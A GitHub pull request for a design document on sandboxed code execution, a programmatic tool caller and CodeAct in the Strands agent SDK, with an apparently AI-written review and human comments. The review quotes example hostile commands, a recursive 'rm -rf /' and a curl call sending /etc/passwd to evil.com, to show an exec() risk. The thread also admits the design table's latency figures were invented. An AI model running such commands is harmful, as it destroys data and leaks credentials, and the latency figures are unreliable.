docs(designs): sandboxes and code execution #681

Open
mkmeral wants to merge 5 commits into strands-agents:main from mkmeral:design/sandboxes-and-codeact

Conversation

@mkmeral
Contributor

@mkmeral mkmeral commented Mar 18, 2026

Description

Design doc proposing three layered additions to Strands:

  1. A Sandbox abstraction (SDK-level) that decouples tool logic from execution environment. Tools delegate to tool_context.agent.sandbox instead of managing their own subprocesses and filesystem access. The agent defaults to LocalSandbox, so existing behavior is preserved. DockerSandbox and AgentCoreSandbox provide isolation for production and cloud deployments. The interface follows the minimal execute() pattern validated by LangChain DeepAgents, E2B, and Daytona.

  2. A tooling layer that updates existing tools (shell, python_repl, file_read, file_write) to use the sandbox, adds a new stateless python tool, and introduces programmatic_tool_caller — a tool that lets the model write Python code to orchestrate other tools, reducing API round-trips and keeping intermediate results out of context.

  3. A CodeActPlugin that implements the CodeAct paradigm (Apple ML Research) via Strands' hook system. Uses AfterInvocationEvent.resume for the observation loop: model generates code, plugin executes it, feeds results back as next observation. No custom agent loop needed.

The doc also covers a tool proxy design for running model-generated code fully inside the sandbox with tool calls proxied back to the host via HTTP, implemented incrementally (host-process first, proxy later).

Includes prior art survey of E2B, Daytona, LangChain DeepAgents, OpenHands, Google ADK, and Anthropic SRT.

Related Issues

Type of Change

  • New content

Checklist

  • I have read the CONTRIBUTING document
  • My changes follow the project's documentation style
  • I have tested the documentation locally using npm run dev
  • Links in the documentation are valid and working

By submitting this pull request, I confirm that you can use, modify, copy, and redistribute this contribution, under the terms of your choice.

mkmeral added 3 commits March 18, 2026 16:20
Introduces a Sandbox abstraction that decouples tool logic from execution
environment, enabling tool reuse across local, Docker, and AgentCore
sandboxes. Covers three layers: Sandbox interface (SDK-level), tooling
updates including programmatic tool caller, and CodeAct plugin for
code-based tool orchestration.

Includes prior art survey of E2B, Daytona, LangChain DeepAgents,
OpenHands, Google ADK, and Anthropic SRT.
- Rename to 'Sandboxes and code execution'
- Rewrite CodeAct plugin to use AfterInvocationEvent.resume for the
  observation loop instead of wrapping the agent
- Fix programmatic tool caller to run in host process, not sandbox
- Add open questions for namespace injection, cwd persistence, and
  parallel execution with research in Appendix C
- Fix duplicate shell example, dead variable, broken appendix link
- Add python tool description
- Add tool proxy section to Layer 1 with incremental rollout plan
- Fix contradiction between programmatic tool caller steps and
  relationship to sandbox section
- Fix async exec issue in CodeAct (wrap in async main)
- Remove redundant open question 1 (now covered by tool proxy section)
- Fix import paths: sandbox implementations live in SDK
- Add sandbox isolation row to comparison table
- Wrap appendices in details/summary tags
@mkmeral mkmeral changed the title Design/sandboxes and codeact docs(designs): sandboxes and codeact Mar 18, 2026
@mkmeral mkmeral changed the title docs(designs): sandboxes and codeact docs(designs): sandboxes and code execution Mar 18, 2026
@github-actions
Contributor

github-actions bot commented Mar 18, 2026

Documentation Preview Ready

Your documentation preview has been successfully deployed!

Preview URL: https://d3ehv1nix5p99z.cloudfront.net/pr-cms-681/docs/user-guide/quickstart/overview/

Updated at: 2026-03-19T22:10:28.182Z

@mkmeral
Contributor Author

mkmeral commented Mar 19, 2026

Related POC branch and notebook

@agent-of-mkmeral
Contributor

agent-of-mkmeral commented Mar 19, 2026

Initial agent review

## 🔍 Deep Review: Sandboxes & Code Execution Design + POC Branch

I've reviewed the full design document (1058 lines), the POC branch (mkmeral/sdk-python@feat/sandbox-abstraction), all implementation files, all test files, and the demo notebook. Below is a no-holds-barred analysis.


✅ What Works Well

The overall architecture is sound. Three things stand out:

  1. Option A (minimal execute()) is the right call. The prior art validates it, and the POC proves it — LocalSandbox, DockerSandbox, and AgentCoreSandbox all implement execute() cleanly, with native overrides where it matters.

  2. Agent-level sandbox (not tool-level) is correct. The shared-filesystem argument is convincing, and the implementation is clean: Agent.__init__ takes sandbox, defaults to LocalSandbox(), tools access via tool_context.agent.sandbox.

  3. Hook-based CodeAct via AfterInvocationEvent.resume is elegant. It avoids a parallel CodeActAgent class and composes with existing agent features.


🐛 Bugs in the POC Branch

Bug 1: write_file heredoc injection — content containing STRANDS_EOF breaks writes

Files: base.py:133, docker.py:249

# base.py
result = await self.execute(f"cat > '{path}' << 'STRANDS_EOF'\n{content}\nSTRANDS_EOF")

If content contains the literal string STRANDS_EOF on its own line, the heredoc terminates early, silently truncating the file or causing a shell syntax error. This is a data corruption bug — any file that happens to contain that string will be silently mangled.

Fix: Use a randomized delimiter:

import secrets
delim = f"STRANDS_EOF_{secrets.token_hex(8)}"
result = await self.execute(f"cat > '{path}' << '{delim}'\n{content}\n{delim}")

Or better yet: for LocalSandbox, just use native file I/O (which the POC already does, so base.py fallback only matters for custom sandboxes that don't override). For DockerSandbox, use docker cp with stdin piping instead of heredoc.
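The stdin-piping idea can be demonstrated locally (a sketch; `shell_write_file` is a hypothetical helper, with `docker exec -i <container>` substituting for plain `sh` in the Docker case):

```python
import shlex
import subprocess

def shell_write_file(path: str, content: str) -> None:
    """Write a file by piping content over stdin to `cat`.

    Because the content never appears on the command line or in a
    heredoc, no delimiter collision is possible; only the path needs
    quoting. For DockerSandbox the same pattern works via
    `docker exec -i <container> sh -c 'cat > <path>'`.
    """
    subprocess.run(
        ["sh", "-c", f"cat > {shlex.quote(path)}"],
        input=content.encode(),
        check=True,
    )
```

Content containing `STRANDS_EOF`, single quotes, or backticks round-trips unchanged, since nothing is interpolated into shell syntax.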

Bug 2: write_file path injection in base.py — unescaped single quotes in path

File: base.py:133

result = await self.execute(f"cat > '{path}' << 'STRANDS_EOF'\n{content}\nSTRANDS_EOF")

If path contains a single quote (e.g., /tmp/it's a file.txt), this produces a broken shell command. The docker.py version uses shlex.quote() (good!), but base.py does not.

Fix: Use shlex.quote(path) in base.py too (for read_file, write_file, list_files).

Bug 3: execute_code shell escaping is incomplete

File: base.py:97

escaped = code.replace("'", "'\\''") 
return await self.execute(f"{language} -c '{escaped}'", timeout=timeout)

This single-quote escaping handles the common case, but hand-rolling shell quoting is fragile: it is easy to miss an edge case, and nothing protects the code if the surrounding quoting style ever changes. (Inside POSIX single quotes, `$` and backticks are actually literal; the risk is the manual escape sequence itself.)

More robust approach:

import shlex
return await self.execute(f"{language} -c {shlex.quote(code)}", timeout=timeout)

Bug 4: AgentCoreSandbox is NOT imported in sandbox/__init__.py but IS re-exported from strands/__init__.py indirectly

Looking at sandbox/__init__.py, AgentCoreSandbox is correctly excluded (good), and strands/__init__.py also correctly excludes it. This is fine, actually.

But DockerSandbox IS re-exported from strands/__init__.py at the top level. This means from strands import DockerSandbox works on systems without Docker. That's fine (error at runtime), but it's worth documenting clearly.

Bug 5: DockerSandbox.write_file docstring says "using docker cp" but implementation uses heredoc

File: docker.py:228

async def write_file(self, path: str, content: str) -> None:
    """Write a file into the container using docker cp."""  # <-- WRONG
    # Actually uses: cat > path << 'STRANDS_EOF'\n...\nSTRANDS_EOF

The same heredoc injection bug as Bug 1 applies here too.

Bug 6: _parse_stream_result checks isError at wrong nesting level

File: agentcore.py:147

is_error = response.get("isError", False)  # checks top-level response

But the response structure has stream[].result at the event level while isError is at the top level. Depending on the actual AgentCore API response format, isError might be per-event, not per-response. This should be validated against the real API schema.

Bug 7: LocalSandbox.write_file has a ternary expression used as statement

File: local.py:96

os.makedirs(os.path.dirname(full_path), exist_ok=True) if os.path.dirname(full_path) else None

This works but is against Python style conventions. Should be:

parent = os.path.dirname(full_path)
if parent:
    os.makedirs(parent, exist_ok=True)

🏗️ Design Issues

🚨 Issue 1 (Showstopper): The async interface doesn't match the sync SDK

The entire Sandbox ABC is async. Every method is async def. But the Strands SDK agent loop is synchronous. The @tool decorator produces sync functions. The current shell, python_repl, file_read, file_write — all sync.

The POC tools (run_command, python_tool, programmatic_tool_caller) are all async def. How do async sandbox tools get called from the synchronous agent loop?

The tests work because pytest-asyncio runs them in an event loop. But in a real Agent(tools=[run_command_tool]) call, the sync agent loop would need to asyncio.run() or loop.run_until_complete() the async tool — and if there's already a running loop (e.g., Jupyter), that creates a nested event loop problem.

This is the biggest design gap. Options:

  1. Make Sandbox have both sync and async interfaces
  2. Make the SDK's tool execution path async-aware (big SDK change)
  3. Add sync_execute() wrappers with asyncio.run() internally
  4. Make Sandbox synchronous by default with an optional async variant

I'd lean toward option 4 for the initial implementation. The design doc should address this explicitly.
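A sketch of what a sync entry point for options 3/4 could look like (`run_sync` is a hypothetical helper; the thread fallback sidesteps the nested-event-loop problem mentioned above):

```python
import asyncio
import concurrent.futures

def run_sync(coro):
    """Drive an async sandbox call from synchronous code.

    If no event loop is running, asyncio.run() suffices. If we are
    already inside a running loop (e.g. Jupyter), asyncio.run() would
    raise RuntimeError, so the coroutine is instead run to completion
    on a fresh event loop in a worker thread.
    """
    try:
        asyncio.get_running_loop()
    except RuntimeError:
        return asyncio.run(coro)  # plain sync context: simple case
    # Already inside a loop: run on a dedicated loop in another thread.
    with concurrent.futures.ThreadPoolExecutor(max_workers=1) as pool:
        return pool.submit(asyncio.run, coro).result()
```

This keeps the Sandbox ABC async while letting sync tools call into it; the cost is a thread hop when invoked from inside a running loop.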

🚨 Issue 2 (flagged as a showstopper, retracted below): programmatic_tool_caller wrapper await bug

File: programmatic_tool_caller.py:53-57

async def wrapper(**kwargs: Any) -> Any:
    caller = getattr(agent.tool, tool_name)
    return caller(**kwargs, record_direct_tool_call=False)

The wrapper is async and the model's code does result = await calculator(expression="2+2"). But agent.tool.calculator() returns a synchronous result (a string like "4").

In the tests this works because MagicMock() return values are MagicMock objects which happen to be awaitable. With real tools, await calculator(expression="2+2") would raise TypeError: object str can't be used in 'await' expression.

Wait — actually, async def wrapper returns the value, and await wrapper() awaits the coroutine (the async function itself), not the return value. So await wrapper() works fine even if caller() returns a string. The await is on the coroutine wrapper, which resolves to the string. My mistake — this is actually correct. Disregard this specific bug.

However, there's still a subtlety: if agent.tool.X() itself is async/returns a coroutine (which could happen with sandbox-based tools), the wrapper wouldn't await it. But for Phase 1 (sync tools), this works.

Issue 3: LocalSandbox loses cd state — the design discusses it but the POC ignores it

Open Question 2 correctly identifies this. But the POC LocalSandbox uses a new subprocess per execute() call:

await sandbox.execute("cd /tmp/workspace")
await sandbox.execute("pwd")  # prints the original working_dir, NOT /tmp/workspace

The existing shell tool has CommandContext for this. Migrating shell to use sandbox breaks cd persistence. This is a regression for any tool migration.

Issue 4: programmatic_tool_caller uses exec() with full builtins

namespace: dict[str, Any] = {"__builtins__": __builtins__}

Model-generated code gets access to __import__, eval, exec, open, os, sys, etc. The model can:

  • import os; os.system('rm -rf /')
  • import subprocess; subprocess.run(['curl', 'http://evil.com', '-d', open('/etc/passwd').read()])

Phase 1 acknowledges this runs in host process, but there's no opt-in safety. Even a basic allowlist would help.

Issue 5: No streaming/real-time output support

ExecutionResult captures stdout/stderr as complete strings. For long-running commands, there's no way to stream output. The current shell tool has real-time PTY output. Migrating to Sandbox.execute() loses this.

Issue 6: Environment variable propagation is underspecified

DockerSandbox takes environment at construction time. But export FOO=bar in one execute() doesn't persist to the next (since docker exec starts a new process). The design discusses cd but not export.


📝 Design Doc Nits

  1. Layer diagram box-drawing characters may not render in all markdown contexts
  2. CodeActPlugin example references self.namespace["__stdout__"] but never sets it — needs redirect_stdout like programmatic_tool_caller
  3. "up to 98.7% token reduction" claim should be presented more cautiously with methodology context
  4. Tool proxy says "httpx must be available inside the sandbox", but python:3.12-slim doesn't include httpx. Need to bootstrap dependencies
  5. CodeAct is P2 but is the most architecturally ambitious. Consider a minimal CodeAct POC as P1 to validate the resume-based approach early

🔬 POC Branch Code Quality

Overall good — clean docstrings, proper type hints, comprehensive tests:

  • ✅ 6 test files covering all components
  • ✅ Good use of mocks for Docker/AgentCore
  • ✅ The notebook is excellent for onboarding
  • ❌ Missing integration tests (all Docker/AgentCore are mocked)
  • MockSandbox and _make_tool_context duplicated across test files — needs shared conftest.py

🎯 Summary: Showstoppers vs. Nice-to-Haves

Must Fix Before Merging

  1. 🚨 Async/sync mismatch (Issue 1) — the tool layer can't work with the current sync SDK
  2. Heredoc injection (Bug 1, 5) — data corruption risk
  3. Shell escaping in base.py (Bug 2, 3) — path and code injection

Should Fix

  1. cd persistence regression (Issue 3)
  2. Security of exec() with full builtins (Issue 4)
  3. Misleading docker cp docstring (Bug 5)
  4. Ternary-as-statement style issue (Bug 7)

Nice to Have

  1. Streaming output support (Issue 5)
  2. Shared test fixtures (conftest.py)
  3. Integration tests
  4. More cautious token reduction claims

The overall vision is strong, the prior art survey is thorough, and the layered design with incremental phases is practical. The async/sync question is the key architectural decision that needs resolution before implementation proceeds.

cc @mkmeral

…eedback

- Change execute() to AsyncGenerator that yields output lines and
  final ExecutionResult, matching SDK's existing async tool streaming
- Add State management section to Layer 1 with stateless-by-default
  recommendation and rationale (concurrency safety)
- Move state discussion out of open questions into proper design section
- Explicitly address cd and export persistence in stateless model
- Update shell tool example to show streaming pattern
- Update TypeScript interface to match
Update Option A interface, tool examples, TypeScript SDK, and all three
Appendix A implementation sketches to match the actual code.

Main body:
- Replace AsyncGenerator streaming with direct ExecutionResult return
- Use shlex.quote() for shell escaping in convenience methods
- Use randomized heredoc delimiter (secrets.token_hex) in write_file
- Remove _execute_to_result() helper (not needed without streaming)
- Update tool usage examples (shell, my_tool) to use await pattern
- Update TypeScript interface to use Promise<ExecutionResult>

Appendix A — LocalSandbox:
- Add timeout error handling (proc.kill() on TimeoutError)
- Add absolute path resolution (os.path.isabs check)
- Add os.makedirs for parent directory creation in write_file
- Add class docstring

Appendix A — DockerSandbox:
- Replace ... placeholders with full implementation
- Add _run_docker helper with stdin_data support
- Add stdin pipe approach for write_file (no heredoc injection)
- Add shlex.quote for safe path handling
- Add working_dir parameter and container lifecycle
- Add timeout handling

Appendix A — AgentCoreSandbox:
- Fix import path (bedrock_agentcore.tools.code_interpreter_client)
- Add _parse_stream_result helper for response parsing
- Add list_files override with native API
- Add uuid-based default session naming
- Add stop() method
- Add proper error handling in read_file/write_file
@mkmeral mkmeral marked this pull request as ready for review March 23, 2026 16:50
| | Option A (minimal `execute()`) | Option B (full interface) |
|--------|-------------------------------|----------------------------|
| Methods to implement | 1 required, 4 optional overrides | 5 required |
| New provider effort | Minimal — one method gets you a working sandbox | Higher — must implement all filesystem ops |
| Filesystem quality | Shell-based by default (encoding/binary issues) | Native by default (provider controls quality) |
Member

@lizradway lizradway Mar 23, 2026


What kind of issues/what does this look like/what customer impacting limitations does this impose?

Contributor Author


So essentially, if you are trying to send all data (including files) over the shell, you will need to base64-encode it, and also be extra careful about file endings. For example, normally you'd have EOF tags, but now that everything goes over the shell, what if the file content contains that tag? You might end up parsing something wrong

The tradeoff here is, more methods are better/safer, but single method is better DevX, and easier to understand/develop.

So we propose a single-method abstraction, but still provide the other methods (file read/write/etc.) as overridable, so folks can achieve a higher security bar.

Member


I comment on it elsewhere, but I'd lean on:

The tradeoff here is, more methods are better/safer

Over:

but single method is better DevX, and easier to understand/develop.

Especially given tenet:

The obvious path is the happy path

The # of people who will be implementing a Sandbox will be small, I think, compared to the number of users, so we want to nudge the implementation to be the right one. We can always offer BaseShellSandbox for "easy devx" IMHO


The following table summarizes the planned Sandbox implementations. See [Appendix A](#appendix-a-sandbox-implementation-sketches) for code examples.

| Sandbox | Where it runs | Isolation | Latency | Use case |
Member


Where do these latency stats come from?

Contributor Author


Claude made them up; honestly I didn't even check that column. I will delete it later, since that doesn't really concern us in the scope of this doc

Member


I think it is definitely a statistic that would be useful to know, as it will have a large net influence on high-tool-use conversations on Sandbox, but I'd be curious to see this tested rather than hallucinated lol.

│ result = await calculator(expression="2 + 2") │
│ print(result) │
└──────────────────────┬──────────────────────────────────┘
│ HTTP POST /tool/calculator
Member


Might be nice to have this in mermaid so it is renderable on gh.

Contributor Author


technically we can. Claude decided to do it 😅

That said, diagrams are a bit more annoying in PR version, I tend to review on raw md files (maybe i should change lol)

Member


I tend to review on raw md files

It would help me; I do side-by-side and mermaid would be prettier :)


- `LocalSandbox` — spawns a fresh subprocess per `execute()` call. Stateless by default.
- `DockerSandbox` — each `docker exec` gets its own process. Filesystem changes persist (shared container), but cwd and env do not carry across calls.
- `AgentCoreSandbox` — session state persists natively via the AgentCore API.

Which aspects of AgentCore are you imagining here? Which API?

Contributor Author


https://github.com/strands-agents/tools/blob/main/src/strands_tools/code_interpreter/agent_core_code_interpreter.py

These APIs: essentially AC creates a code interpreter instance that we can connect to and run code on. That container itself is stateful (I'm guessing up to a certain TTL)

result = agent("Calculate the squares of numbers 1-100 and sum them")

The model might respond with a `programmatic_tool_caller` invocation containing:
Member


just a thought -- I'm curious if this could have a twin tool that integrates with AI functions. seems fairly similar in nature.


#### How it works

1. The model receives `programmatic_tool_caller` as one of its available tools
Member


Would the model prefer writing code that calls tools or code that uses libraries/clients. In the case below for example, the model could instead write:

print(sum(i ** 2 for i in range(1, 101)))

Contributor Author


I think the answer is (as always): it depends. This is an application security concern. Depending on my security posture and what I want to accomplish, I might want to enable more libraries (or fewer).

If I want a highly secure env but still want to use PTC (programmatic tool caller, I hate writing the long name), I can just remove everything from the namespace except the tools, and maybe add the AC code interpreter as the sandbox.

But if I am running this locally to search GitHub for Strands references, I will be a lot more relaxed w.r.t. what I give my agent


### P0

- [ ] Define `Sandbox` ABC and `ExecutionResult` in `sdk-python`
Member


estimates/sizes?

Contributor Author


I don't believe in them anymore 🙃

I already have a branch that implements this https://github.com/mkmeral/sdk-python/tree/feat/sandbox-abstraction and a notebook if you want to try it out https://github.com/mkmeral/sdk-python/blob/feat/sandbox-abstraction/notebooks/sandbox_demo.ipynb

Member

@lizradway lizradway Mar 23, 2026


will poke around! but any estimates on date/effort to get this code from dev branch into prod? mainly asking so i can track this for context management and have this inform my roadmap dates.

wrapped = "async def __codeact_main__():\n" + "\n".join(
    f"    {line}" for line in code.splitlines()
)
exec(compile(wrapped, "<codeact>", "exec"), self.namespace)
Member


Does it have to be limited to Python?

agent-of-mkmeral added a commit to mkmeral/tools that referenced this pull request Mar 25, 2026
Aligns programmatic_tool_caller with the sandboxes design doc
(strands-agents/docs#681) Phase 1 requirements:

- Remove Executor ABC and LocalAsyncExecutor classes
  The design doc separates Sandbox (SDK-level, where code runs) from
  the programmatic tool caller (tools-level, runs in host process).
  The Executor abstraction competed with the Sandbox design.

- Inline async execution logic directly in the tool function
  Phase 1 always runs orchestration code in-process. The ~15 lines
  of execution logic are now directly in programmatic_tool_caller().

- Use compile() for better error tracebacks
  Per the design doc: compile(code, '<programmatic_tool_caller>', 'exec')
  gives clearer tracebacks than raw exec().

- Remove custom executor documentation and examples
  The Custom Executors section in the module docstring is removed.
  The Sandbox + Tool Proxy design (Phase 2) replaces this concept.

- Remove executor-related tests
  TestExecutor class and test_custom_executor removed. Added
  test_stderr_captured and test_syntax_error_handled for coverage.

The core tool logic (tool wrappers, _execute_tool, _create_async_tool_function,
_validate_code, _get_allowed_tools) is unchanged. The tool gets simpler, not
more complex.

Refs: strands-agents/docs#681, strands-agents#387
└─────────────────────────────────────────────────┘

### Layer 1: Sandbox
Member


Let's decouple the name; Sandbox implies safety, but this is more of an Environment esp when running locally.

Not a fan of Environment directly either, but it's closer than Sandbox

Contributor Author


I have naming alternatives below. I think environment is too overloaded


#### Interface

The Sandbox ABC lives in the SDK (`strands-agents/sdk-python`). Concrete implementations (`LocalSandbox`, `DockerSandbox`, `AgentCoreSandbox`) also live in the SDK as vended sandbox providers, similar to how the SDK already vends tools and plugins. Third-party sandbox providers can be published as separate packages.
Member


Concrete implementations (LocalSandbox, DockerSandbox, AgentCoreSandbox)

I'm not as convinced of this living in the SDK, esp. docker and AgentCoreSandbox, esp because of the dependencies they might include. I'm okay with us vending them, but the SDK isn't the right place

share the same Sandbox instance, giving them a common working
directory, environment variables, and filesystem.

Implementations only need to provide execute(). All other methods
Member


Implementations only need to provide execute(). All other methods are built on top of it.

Option 1 & Option 2 are the same API shape, it's just that one provides a default implementation, right?

I'd like to nudge implementors to implement the full Sandbox to be more efficient; ShellBasedSandbox can be an escape hatch for those that just have a shell or don't care about optimizations, but I think the default is "Conform to this entire API"

async def write_file(self, path: str, content: str) -> None: ...

@abstractmethod
async def list_files(self, path: str = ".") -> list[str]: ...
Member


3 file APIs is fewer than I'd expect TBH; are we sure that's it?

https://developer.mozilla.org/en-US/docs/Web/API/File_System_API is a sandboxed implementation of a filesystem (and one we should identify as a potential target for TS) to see what else we might need. The only thing I really see from there is a "get[root]Directory()"


We recommend stateless by default: each `execute()` call is independent. This avoids concurrency issues when multiple tools call the sandbox in parallel (tool A does `cd /tmp`, tool B does `cd /home` — with shared state, the last one wins and both are confused). Stateless execution is predictable and matches the LangChain DeepAgents model.

This means `cd`, `export`, and other state-modifying commands do not persist between calls. Tools that need state persistence (for example, a shell tool that tracks `cd` across calls) can manage it themselves, as the current `shell` tool already does via `CommandContext`.
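For illustration, here is one way a tool could track `cd` itself on top of a stateless `execute()` (a sketch, not the existing CommandContext implementation; it assumes `execute()` returns an object with a `stdout` attribute):

```python
import shlex

class CwdTracker:
    """Client-side cwd tracking over a stateless sandbox.

    Every command is prefixed with `cd <cwd> &&`; afterwards the shell
    echoes its final working directory on a marker line, which becomes
    the cwd for the next call.
    """

    def __init__(self, sandbox, cwd: str = "/"):
        self.sandbox = sandbox
        self.cwd = cwd

    async def run(self, command: str):
        wrapped = (
            f"cd {shlex.quote(self.cwd)} && {command}; "
            "echo __CWD__$(pwd)"
        )
        result = await self.sandbox.execute(wrapped)
        # Recover the directory the command ended in, for next time.
        for line in reversed(result.stdout.splitlines()):
            if line.startswith("__CWD__"):
                self.cwd = line[len("__CWD__"):]
                break
        return result
```

The sandbox itself stays stateless and concurrency-safe; the statefulness lives entirely in the tool instance.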
Member


for example, a shell tool that tracks cd across calls

Have we POC'd this? I'd be curious if the shell would be able to track this given that it'd be delegating to the Sandbox for a lot more work.


#### Tool proxy

When code runs inside a sandbox (for example, the programmatic tool caller or CodeAct executing model-generated code in Docker), that code needs to call agent tools. But agent tools are Python objects in the host process — they cannot be serialized into a remote sandbox. The tool proxy solves this by bridging tool calls from the sandbox back to the host.
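The bridge direction can be illustrated with a small stub (a sketch under assumed shapes: the doc mentions httpx, but stdlib urllib works the same way, and the `POST /tool/<name>` endpoint with a JSON `{"result": ...}` envelope is hypothetical):

```python
import json
from urllib import request

def make_tool_stub(host_url: str, tool_name: str):
    """Build a function that runs inside the sandbox and forwards a
    tool call to the host process over HTTP, returning the result."""
    def stub(**kwargs):
        req = request.Request(
            f"{host_url}/tool/{tool_name}",
            data=json.dumps(kwargs).encode(),
            headers={"Content-Type": "application/json"},
        )
        with request.urlopen(req) as resp:
            return json.loads(resp.read())["result"]
    return stub
```

Model-generated code in the sandbox would then get `calculator = make_tool_stub(host, "calculator")` injected and use it like a local function, while the real tool object stays in the host process.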
Member


that code needs to call agent tools

I wonder: do they? Have we explored splitting the world in terms of "Tools that are attached to the environment, but not the agent"? That would reduce a lot of complexity.

What I'm trying to tease out is: how important is tool context vs code-execution:

Strands tools have closures over the agent, access ToolContext, make API calls — they cannot be serialized as source

We recommend the callback proxy approach, implemented incrementally:

1. Phase 1 (P0/P1): orchestration code runs in the host process. Tools are local async functions. This is simple and works today.
2. Phase 2 (P2): add a tool proxy server. Orchestration code runs fully inside the sandbox. Tool calls are proxied back to the host via HTTP.
Member


If we go forward with the concept of a tool proxy, I think the sandbox should have the concept of the proxy built in; otherwise we're delegating a lot of complexity to the caller


#### New `python` tool

A new sandbox-based `python` tool delegates to `sandbox.execute_code()`. Unlike the existing `python_repl` (which maintains a persistent namespace via `dill` serialization and supports interactive PTY), the `python` tool is stateless — each invocation runs in a fresh interpreter. This is simpler, works across all sandbox types, and is the recommended default. The existing `python_repl` tool remains available for use cases that need stateful execution.
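The stateless model reduces to "fresh interpreter per call"; a local sketch (a hypothetical helper standing in for the proposed `sandbox.execute_code()`):

```python
import subprocess
import sys

def execute_code_stateless(code: str, timeout: float = 30.0):
    """Run Python code in a brand-new interpreter process.

    Nothing (variables, imports, cwd) persists between calls, which is
    exactly the behavior the proposed stateless python tool relies on.
    """
    proc = subprocess.run(
        [sys.executable, "-c", code],
        capture_output=True, text=True, timeout=timeout,
    )
    return proc.stdout, proc.stderr, proc.returncode
```

A second call cannot see state from the first, which is what makes this model safe under parallel tool calls.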
**Reviewer comment:**

Does it have to be python? I'm thinking that in the browser, JS is the natural choice.


**Reviewer comment:**
Did we do an analysis on other similar tools to see if they're mostly stateless? I can imagine that stateful execution would be useful for incremental development. Not a blocker though


#### Relationship to Sandbox

The programmatic tool caller does not run its code in the sandbox. It runs the model's orchestration code in the host process, injecting tool wrappers as async functions that call `agent.tool.X()`. Those tools in turn use the sandbox. The sandbox is used by the individual tools, not by the orchestration layer.
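A minimal sketch of that injection, with plain functions standing in for `agent.tool.X()` calls (all names here are hypothetical, not SDK API):

```python
import asyncio

# Stand-ins for agent tools; in Strands these wrappers would call
# agent.tool.X(), which in turn may use agent.sandbox.
def file_read(path: str) -> str:
    return f"<data from {path}>"

def word_count(text: str) -> int:
    return len(text.split())

def make_wrapper(fn):
    """Expose a host tool as an async function in the orchestration namespace."""
    async def wrapper(**kwargs):
        return fn(**kwargs)
    return wrapper

namespace = {"file_read": make_wrapper(file_read),
             "word_count": make_wrapper(word_count)}

# Model-generated orchestration code runs in the host process; only the
# final value needs to flow back into the model's context.
orchestration = """
async def main():
    text = await file_read(path="report.txt")
    return await word_count(text=text)
"""
exec(orchestration, namespace)
result = asyncio.run(namespace["main"]())
```

The intermediate `text` value never enters the conversation, which is the round-trip and context saving the tool is after.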
**Reviewer comment:**

> It runs the model's orchestration code in the host process

Why? This seems like we'd have two different execution patterns - why not do it in the sandbox?


#### How it works in Strands

CodeAct maps naturally to Strands' hook system. The [`AfterInvocationEvent.resume`](https://strandsagents.com/docs/user-guide/concepts/agents/hooks/index.md) property triggers a follow-up agent invocation with new input, which is exactly the CodeAct observation loop: model generates code → execute → feed results back as next observation → model generates more code.
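The loop the hook implements can be sketched without the SDK at all. Below, a scripted function stands in for the model, and hypothetical `<execute>` tags stand in for whatever code-block convention the plugin's prompt establishes:

```python
import io
import re
from contextlib import redirect_stdout

def extract_code(response: str):
    """Pull code from a hypothetical <execute>...</execute> block."""
    match = re.search(r"<execute>(.*?)</execute>", response, re.DOTALL)
    return match.group(1) if match else None

def run_code(code: str) -> str:
    """Execute the block; captured stdout becomes the next observation."""
    buf = io.StringIO()
    with redirect_stdout(buf):
        exec(code, {})
    return buf.getvalue()

# Scripted stand-in for the model: one code turn, then a final answer.
turns = iter([
    "<execute>print(sum(range(10)))</execute>",
    "The sum is 45.",
])
model = lambda observation: next(turns)

observation, answer = "task: sum the integers 0..9", None
for _ in range(5):                   # bounded observation loop
    response = model(observation)
    code = extract_code(response)
    if code is None:                 # no code: final answer, stop resuming
        answer = response
        break
    observation = run_code(code)     # the AfterInvocationEvent.resume role
```

In the plugin, the `for` loop disappears: each `resume` triggers the next invocation, and the hook only decides whether to execute-and-resume or stop.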
**Reviewer comment:**

I think the state machine would be a better fit; this is effectively rewriting the agent-loop.

But that's an implementation detail, I guess.

| Sandbox isolation | Phase 1: host process. Phase 2: full sandbox via tool proxy | Phase 1: host process. Phase 2: full sandbox via tool proxy |
| Use case | Optimization for batch operations | Full paradigm shift |

The programmatic tool caller is a tool the model can optionally use within standard tool calling. CodeAct changes how the agent interacts entirely — the model always writes code, and the hook system handles execution and feedback.
**Reviewer comment:**

What have been the most common use cases for CodeAct? Coding agents?


### Layer 3: CodeAct plugin

CodeAct is a higher-level paradigm where the agent always responds with code instead of JSON tool calls. It is implemented as a hook using the existing agent lifecycle, not a modification to the agent loop.
**Reviewer comment:**

This is really interesting; how effective has it been in practice?

I'm curious how closely the model(s) actually output code instead of text.


## Open questions

1. **Namespace injection for programmatic tool calling.** The programmatic tool caller and CodeAct need tool wrapper functions in the code execution namespace. Phase 1 runs orchestration code in the host process with tools as local functions. Phase 2 uses the tool proxy to run code fully inside the sandbox. See [Tool proxy](#tool-proxy) for the full design and alternatives considered.
**Reviewer comment:**

I'm missing the question here


We recommend that the `Sandbox` interface make no concurrency guarantees; implementations document their own behavior. `LocalSandbox` can handle this by spawning subprocesses that inherit the persistent shell's tracked state (cwd, env) rather than sharing the shell process across all calls.

4. **Interactive mode.** Both `shell` and `python_repl` today support interactive PTY mode for real-time user input. This does not map cleanly to remote sandboxes (Docker, AgentCore). Our inclination is to keep interactive mode as a `LocalSandbox` concern and not complicate the abstract interface. This is not a blocker for the initial implementation and can be revisited later.
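The `LocalSandbox` concurrency approach above (a fresh subprocess per call, inheriting tracked state) can be sketched as follows; the class and method names are illustrative, not the proposed interface:

```python
import os
import subprocess
import tempfile

class LocalSandboxSketch:
    """Illustrative only: each execute() spawns a fresh subprocess that
    inherits tracked state (cwd, env) instead of sharing one shell process."""

    def __init__(self):
        self.cwd = tempfile.mkdtemp()
        self.env = dict(os.environ)

    def execute(self, command: str) -> str:
        # Append the final $PWD so a `cd` in the command updates tracked state.
        wrapped = f'{command}; printf "\\n%s" "$PWD"'
        proc = subprocess.run(["sh", "-c", wrapped], cwd=self.cwd,
                              env=self.env, capture_output=True, text=True)
        output, _, new_cwd = proc.stdout.rpartition("\n")
        self.cwd = new_cwd
        return output

sandbox = LocalSandboxSketch()
sandbox.execute("mkdir -p project && cd project")   # cwd tracked across calls
where = sandbox.execute('basename "$PWD"')
```

Only cwd is tracked here; environment changes would need similar plumbing, but the point is that no shell process is shared between concurrent calls.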
**Reviewer comment:**

> today support interactive PTY mode for real-time user input

How does this end up surfacing to users?


| Name | Pros | Cons |
|------|------|------|
| `Sandbox` (recommended) | Clear mental model, aligns with E2B/Daytona/LangChain ecosystem terminology, implies containment | Implies isolation that `LocalSandbox` does not provide |
**Reviewer comment:**

Ha; here's the section.

> Clear mental model, aligns with... implies containment

